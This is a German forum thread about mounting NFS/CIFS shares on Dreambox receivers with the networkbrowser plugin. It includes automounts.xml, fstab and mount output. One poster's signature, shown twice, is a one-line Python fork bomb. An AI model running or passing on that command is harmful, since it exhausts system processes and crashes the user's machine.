Angepinnt Einbinden von NFS/CIFS Freigaben ab 2.4.17

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • Einbinden von NFS/CIFS Freigaben ab 2.4.17

    Da es ja immer wieder Probleme mit dem einbinden von NFS/CIFS Freigaben gibt hab ich im OE 2.5 die auto.network wieder deaktiviert und auch den editor entfernt.Somit muss das Plugin enigma2-plugin-systemplugins-networkbrowser installiert werden um NFS/CIFS Freigaben einzubinden und da es hier schon gefühlte 1000000 beiträge zu der automounts.xml gibt erspare ich mir das denn das umstellen sollte ja keine große herausforderung sein.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Grrrrrrrrr !!!!!!!!!!!!!!!!!!!

    WENN Du schon die Guillotine ohne Warnschuß schwingst, wäre es nett gewesen in diesem Beitrag zumindest einen Link zum "Umstieg" zu posten. Jetzt darf man wieder in tausenden Postings suchen und rumprobieren.

    MEIN auto.network funktioniert EIN-WAND-FREI.
    Versteh ich nicht.
    OScam Wiki | OScam Documentation | Build your own OScam with simplebuild
    Better a 'found' without entitlements than a 'not found' with valid entitlements.
  • so, habe eben mal den NFS Mount auf der 7080 (HDD meiner 8k) von der auto.network auf fstab mittels Networkbrowser umgestellt und bin eigentlich zufrieden mit dem Ergebnis.

    Es wurden von DMM einige Optionen standardmäßig in die fstab aufgenommen, die jetzt zumindest hier gut funktionieren.

    Löschen der Freigabe im Mount Manager sowie die timout Geschichten sind jetzt funktionsfähig, werde erstmal dabei bleiben :)
    OLED55B7D
  • Verwende bitte den Netzwerkbrowser. Du brauchst doch lediglich auf die entsprechende Freigabe mit der Fernbedienung klicken.
    autofs fliegt aus dem Image und dazu gibt es im aktuellen Image keinen Support mehr.
  • ich hab auch probleme mit der nfs freigaben, da ich zwei ordner habe mit archiv und aufnahme, die wollen manchmal angezeigt werden und manchmal wieder nicht :_( warum auch immer obwohl die nfs freigabe da ist bleiben die unterordner leer, wobei ich sagen muss das das löschen des alten ordners beim hinzufügen auch nicht richtig geht, hat jemand dazu nen tipp wie ich die freigaben evtl löschen kann, die sie auch nicht mehr angezeigt werden die ich nicht mehr benötige?
    Samsung - UE55JU6450 - Firmware 1480 + USB3.0 MediaRange - SamyGO_J_sysroot_v5.1 + OSCAM mit tzcamd
    2xDM900 DVB-S (TWIN)
    Zyxel NAS 326
    BitFenix Prodigy ITX Tower & ASRock-J3455-ITX mit picoPSU-120 & Salcar 72W Netzteil und 16GB Ram von Kingston & Transcend & Seagate & TV-Headend mit Digital Devices V-6.2 mit DVB-S Twin & DVB-C Single & Common Interface DUO Digital Devices
    :prost: :lesen: :saufen:
  • Da niemand deine Freigaben kennt oder dein Netzwerk auch nicht dein NFS Server und keiner weiß was du verwendest netzwerkbrowser oder automount wird dir keiner helfen können.Und es gibt etliche beiträge zu nfs und cifs mounts lesen kann nicht schaden also suchfunktion benutzen.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Einbinden von NFS/CIFS Freigaben ab 2.4.17

    Aufnahmepfade hab ich natürlich angepasst.

    Hier die fstab

    rootfs / rootfs rw,relatime 0 1
    proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
    sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0
    devpts /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620 0 0
    tmpfs /dev/shm tmpfs rw,nosuid,nodev,relatime 0 0
    tmpfs /run tmpfs rw,nosuid,nodev,relatime,mode=755 0 0
    tmpfs /tmp tmpfs rw,relatime 0 0
    tmpfs /var/volatile tmpfs rw,relatime,mode=755 0 0
    10.21.10.4:/media/hdd /media/hdd nfs udp,x-systemd.automount,retrans=1,noauto,wsize=8192,x-systemd.idle-timeout=60,retry=0,nolock,rw,x-systemd.device-timeout=15,timeo=2,rsize=8192,soft,nofail 0 0
  • Ich habe jetzt auch auf den Networkbrowser aktiviert und meine Freigaben damit eingebunden. Die Freigaben vom NAS klappen auch alle, nur mit dem Einbinden der DM8000 habe ich Schwierigkeiten.
    Nach längerem Basteln habe ich den Eintrag im Networkbrowser wieder gelöscht (NFS Schlafzimmer auf 192.168.178.15 /media/hdd/movie), in der /etc/enigma2/automounts.xml ist er auch raus. Jetzt ist aber immer noch das Verzeichnis /media/Schlafzimmer vorhanden, welches ich auch händisch nicht löschen kann. Wie bekomme ich das Verzeichnis für einen neuen Versuch weg?

    aktuelle /etc/enigma2/automounts.xml:
    Spoiler anzeigen

    <?xml version="1.0" encoding="UTF-8"?>
    <mountmanager>
    <nfs>
    <mount>
    <active>True</active>
    <hdd_replacement>False</hdd_replacement>
    <ip>192.168.178.10</ip>
    <sharename>Sic</sharename>
    <sharedir>/Sic</sharedir>
    <options>rw,nolock,udp</options>
    </mount>
    </nfs>
    <nfs>
    <mount>
    <active>True</active>
    <hdd_replacement>False</hdd_replacement>
    <ip>192.168.178.10</ip>
    <sharename>Sonstiges</sharename>
    <sharedir>/Sonstiges</sharedir>
    <options>rw,nolock,udp</options>
    </mount>
    </nfs>
    <nfs>
    <mount>
    <active>True</active>
    <hdd_replacement>False</hdd_replacement>
    <ip>192.168.178.10</ip>
    <sharename>Filme</sharename>
    <sharedir>/Filme_Dreambox</sharedir>
    <options>rw,nolock,udp</options>
    </mount>
    </nfs>
    <nfs>
    <mount>
    <active>True</active>
    <hdd_replacement>False</hdd_replacement>
    <ip>192.168.178.10</ip>
    <sharename>Plugins</sharename>
    <sharedir>/Plugins</sharedir>
    <options>rw,nolock,udp</options>
    </mount>
    </nfs>
    </mountmanager>


    ll /media:
    Spoiler anzeigen

    root@dm7080:/media$ ll /media
    drwxr-xr-x 9 root root 4096 Apr 12 15:15 .
    drwxr-xr-x 27 root root 4096 Apr 10 13:46 ..
    drwxr-xr-x 2 root root 0 Jan 1 1970 Filme
    drwxr-xr-x 2 root root 0 Jan 1 1970 Plugins
    drwxr-xr-x 2 root root 4096 Apr 10 14:19 Schlafzimmer
    drwxr-xr-x 2 root root 0 Jan 1 1970 Sic
    drwxr-xr-x 2 root root 0 Jan 1 1970 Sonstiges
    drwxr-xr-x 10 root root 4096 Apr 12 14:40 hdd
    drwxr-xr-x 6 root root 4096 Apr 12 10:02 usb
    root@dm7080:/media$
  • Danke hat funktioniert.

    Jetzt habe ich nochmal versucht, die Freigabe der DM8000 einzubinden, klappt aber nicht.

    aktuelle /etc/enigma2/automounts.xml:
    Spoiler anzeigen

    <?xml version="1.0" encoding="UTF-8"?>
    <mountmanager>
    <nfs>
    <mount>
    <active>True</active>
    <hdd_replacement>False</hdd_replacement>
    <ip>192.168.178.10</ip>
    <sharename>Sic</sharename>
    <sharedir>/Sic</sharedir>
    <options>rw,nolock,udp</options>
    </mount>
    </nfs>
    <nfs>
    <mount>
    <active>True</active>
    <hdd_replacement>False</hdd_replacement>
    <ip>192.168.178.10</ip>
    <sharename>Sonstiges</sharename>
    <sharedir>/Sonstiges</sharedir>
    <options>rw,nolock,udp</options>
    </mount>
    </nfs>
    <nfs>
    <mount>
    <active>True</active>
    <hdd_replacement>False</hdd_replacement>
    <ip>192.168.178.15</ip>
    <sharename>Schlafzimmer</sharename>
    <sharedir>/media/hdd/movie</sharedir>
    <options>rw,nolock,udp</options>
    </mount>
    </nfs>
    <nfs>
    <mount>
    <active>True</active>
    <hdd_replacement>False</hdd_replacement>
    <ip>192.168.178.10</ip>
    <sharename>Filme</sharename>
    <sharedir>/Filme_Dreambox</sharedir>
    <options>rw,nolock,udp</options>
    </mount>
    </nfs>
    <nfs>
    <mount>
    <active>True</active>
    <hdd_replacement>False</hdd_replacement>
    <ip>192.168.178.10</ip>
    <sharename>Plugins</sharename>
    <sharedir>/Plugins</sharedir>
    <options>rw,nolock,udp</options>
    </mount>
    </nfs>
    </mountmanager>



    mount zeigt folgendes:
    Spoiler anzeigen

    root@dm7080:~$ mount
    /dev/mmcblk0p1 on / type ext4 (rw,relatime,data=ordered)
    devtmpfs on /dev type devtmpfs (rw,relatime,mode=755)
    sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
    proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
    securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
    tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,relatime)
    devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620)
    tmpfs on /run type tmpfs (rw,nosuid,nodev,relatime,mode=755)
    tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
    cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)
    cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpuacct,cpu)
    cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
    cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
    cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
    systemd-1 on /media/Plugins type autofs (rw,relatime,fd=28,pgrp=1,timeout=60,minproto=5,maxproto=5,direct)
    systemd-1 on /media/Filme type autofs (rw,relatime,fd=33,pgrp=1,timeout=60,minproto=5,maxproto=5,direct)
    mqueue on /dev/mqueue type mqueue (rw,relatime)
    systemd-1 on /media/Sonstiges type autofs (rw,relatime,fd=34,pgrp=1,timeout=60,minproto=5,maxproto=5,direct)
    systemd-1 on /media/Sic type autofs (rw,relatime,fd=35,pgrp=1,timeout=60,minproto=5,maxproto=5,direct)
    tmpfs on /tmp type tmpfs (rw,relatime)
    tmpfs on /var/volatile type tmpfs (rw,relatime,mode=755)
    nfsd on /proc/fs/nfsd type nfsd (rw,relatime)
    fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime)
    /etc/auto.misc on /misc type autofs (rw,relatime,fd=6,pgrp=280,timeout=300,minproto=5,maxproto=5,indirect)
    -hosts on /net type autofs (rw,relatime,fd=12,pgrp=280,timeout=300,minproto=5,maxproto=5,indirect)
    /etc/auto.hotplug on /autofs type autofs (rw,relatime,fd=18,pgrp=280,timeout=300,minproto=5,maxproto=5,indirect)
    /dev/sdb1 on /media/usb type ext4 (rw,relatime,data=ordered)
    /dev/sda1 on /media/hdd type ext4 (rw,relatime,data=ordered)
    systemd-1 on /media/Schlafzimmer type autofs (rw,relatime,fd=27,pgrp=1,timeout=60,minproto=5,maxproto=5,direct)
    root@dm7080:~$


    telnet:
    cd /media
    ll
    cd Schlafzimmer
    Spoiler anzeigen

    root@dm7080:~$ cd /media
    root@dm7080:/media$ ll
    drwxr-xr-x 9 root root 4096 Apr 12 16:02 .
    drwxr-xr-x 27 root root 4096 Apr 10 13:46 ..
    drwxr-xr-x 2 root root 0 Jan 1 1970 Filme
    drwxr-xr-x 2 root root 0 Jan 1 1970 Plugins
    drwxr-xr-x 2 root root 0 Apr 12 16:02 Schlafzimmer
    drwxr-xr-x 2 root root 0 Jan 1 1970 Sic
    drwxr-xr-x 2 root root 0 Jan 1 1970 Sonstiges
    drwxr-xr-x 10 root root 4096 Apr 12 14:40 hdd
    drwxr-xr-x 6 root root 4096 Apr 12 10:02 usb
    root@dm7080:/media$ cd Schlafzimmer
    -bash: cd: Schlafzimmer: No such device
    root@dm7080:/media$


    Komisch ist, dass die Freigaben auf das Qnap-NAS fehlerfrei funkionieren.